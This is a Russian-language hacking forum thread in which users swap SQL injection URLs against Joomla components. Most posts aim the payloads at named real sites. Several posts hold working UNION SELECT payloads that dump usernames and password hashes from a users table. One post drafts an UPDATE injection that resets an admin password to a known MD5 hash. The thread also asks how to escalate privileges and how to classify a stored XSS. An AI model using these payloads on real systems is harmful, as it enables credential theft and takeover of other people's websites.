Сменить овнера файла на того, который может выставить нужные права для редактирования файла. Очевидно же. На практике это означает, что нужно повысить свои права, которыx у вас не хватает для вышеперечисленных операций. Ответ на вопрос: "Что тогда делать?" напрашивается сам собой.
уязвимость (SQL inj) Joomla в компоненте Digistore http://www.exploitsdownload.com/exploit/na/joomla-digistore-sql-injection http://joomla15.ijoomlademo.com/index.php?option=com_digistore&controller=digistoreProducts&task=list&cid[]=-2/**/union/**/select/**/user(),user(),user(),version(),user(),user() Объясните пожалуйста, при помощи этой уязвимости реально слить хэши и ники из основной БД сайта?
а в чем проблема? Code: http://joomla15.ijoomlademo.com/index.php?option=com_digistore&controller=digistor%20eProducts&task=list&cid[]=-2/**/union/**/select/**/group_concat%28username,0x3a,password%29,2,3,4/**/from/**/j17w2hcpwjzo5__users
Я бы был невероятно признателен Вам, если бы разъяснили в чём соль. Просто в прошлый раз когда я получал пароли на локалхосте (самописный двиг с детской уязвимостью), все хэши выпадали в ошибку, а тут даже в исходном коде нет намёков. Извините если напрягаю
No checkbone? Code: http://www.wollatonpirates.co.uk/index.php?option=com_joomleague&func=showNextMatch&p=1
наркоман шоле? Serafim белым по русски написал вроде: http://forum.antichat.ru/showpost.php?p=3117961&postcount=20488
Будучи новичком в этом, не зря попросил разъяснения. То, что вы молчите и смотрите свысока не делает вас умнее. Я к примеру, когда понимаю в какой-то области - помогаю, если вижу что человек тупит - не скатываюсь до уровня скотины с оскорблениями, для меня лучше пройти мимо. И то, подобное редкость, в основном подаю руку.
какие оскорбления? ты на прошлой странице написал, что нет ни единого намёка в исходном коде, если ты туда смотрел - ты не мог не заметить вывода. и кто тебе сказал, что тебе обязаны разжёвывать и класть в рот? твоя невнимательность - это только твоя проблема.
Сейчас я понял откуда пошло недопонимание - я использую Google Chrome и поведение кодировок в ссылках там несколько иное, нежели в FF. Соответственно и результат иной. Если бы я раньше это узрел, то не просил пояснений.
Я сейчас через Canary сижу, ну ладно, суть не в этом. как я понимаю запрос выглядит так ( синтаксис скорее всего в корне неправильный) UNION SELECT group_concat(`username`,`password`),2,3,4 FROM `jos_users` если выполнять SET password='21232f297a57a5a743894a0e4a801fc3' WHERE id = 62; то это должно выглядеть так: /**/update/**/jos_users/**/SET/**/password='21232f297a57a5a743894a0e4a801fc3'/WHERE/**/id=62 Поправьте
Есть xss на одном ресурсе, не получается определить тип. Создаю новость, вписываю в тело страницы При обновлении, вылетает пустой алерт. В исходнике не отображается вписанный код. Первая мысль, что это DOM-BASED, но вся соль в том, что я ява-скрипт не вписываю через адресную строку, следовательно мой код где-то сохраняется, но когда после вылета алерта открываю исходник, то эксплойта нет! не подскажите, что за бред с xss?)